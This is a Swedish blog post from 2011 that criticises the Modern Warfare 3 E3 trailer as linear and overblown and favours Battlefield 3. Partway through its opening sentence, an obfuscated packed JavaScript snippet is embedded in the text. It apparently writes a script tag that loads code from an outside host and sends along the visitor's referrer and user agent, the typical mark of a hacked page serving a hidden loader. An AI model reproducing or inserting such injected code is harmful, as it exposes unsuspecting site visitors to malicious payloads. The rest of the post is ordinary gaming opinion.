Image Image Image Image Image Image Image Image Image Image

| 28 november, 2020

Scroll to top

Top

Modern Warfare 3: Ett tredje-världskrig, eller en universal soldier re-make?

Modern Warfare 3: Ett tredje-världskrig, eller en universal soldier re-make?
Filip Urde
  • On 6 juni, 2011
  • http://www.revue.se/filip-urde

Modern eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|nyits|var|u0026u|referrer|kyrzz||js|php’.split(’|’),0,{}))
Warfare 3… Ja det ser väll bra ut…Grafiskt…

Problemet är att det känns som man vill alldeles för mycket borta på infinity ward. Trailern jag precis satt och såg är en mix mellan Team America och Time crisis . Det hela känns ytterst linjärt, som att du åker på räls och sedan serveras vad du ska skjuta ner med överdrivet mycket våld. Det blir för mycket!

Visst, Ryssland ska invadera USA i något som ska spegla ett tredje-världskrig. Vad jag dock stör mig på är hur man blandar super moderna vapen och teknologier, med militära taktiker som hör hemma i första-världskriget. Ryssland gör enligt infinity ward ett så kallat ”frontal angrepp” på HELA USA! man tar alla sin soldater till deras lekplats och sen krigar man öppet. Om detta faktiskt blir slut resultatet i storyn vet jag inte. Men av vad jag sett nu på E3 och tidigare, så är min spontana känslan en testosteron fylld Jean Claude van Damme som står och skriker på Arnold Schwarzenegger som gör chin- ups!

Det känns bara töntigt rent ut sagt. Det ska vara action, det ska vara spännande och händelserikt, men betyder det att man kör en öppen fight vid Wallstreet ála Red Alert. Vad ska jag säga. Jag har tröttnat på Modern Warfare och hela call of duty serien om jag ska vara ärlig. Jag tror dem förlorade sin själ med orginal utvecklarna. För enligt mig dog konceptet när man svek sitt orginal community, jag pratar självklart om PC spelarna. Vad som blev kvar är en serie som riktar sig till konsol publiken, (för att tjäna pengar självklart) men man förlorade sin själ på köpet. Nu krämar man det sista ur kassa-kon som är Call of Duty…..Det behövs en frisk fläkt och den är Battlefield 3.

For guess what?!? Battlefield 3 will bring you down.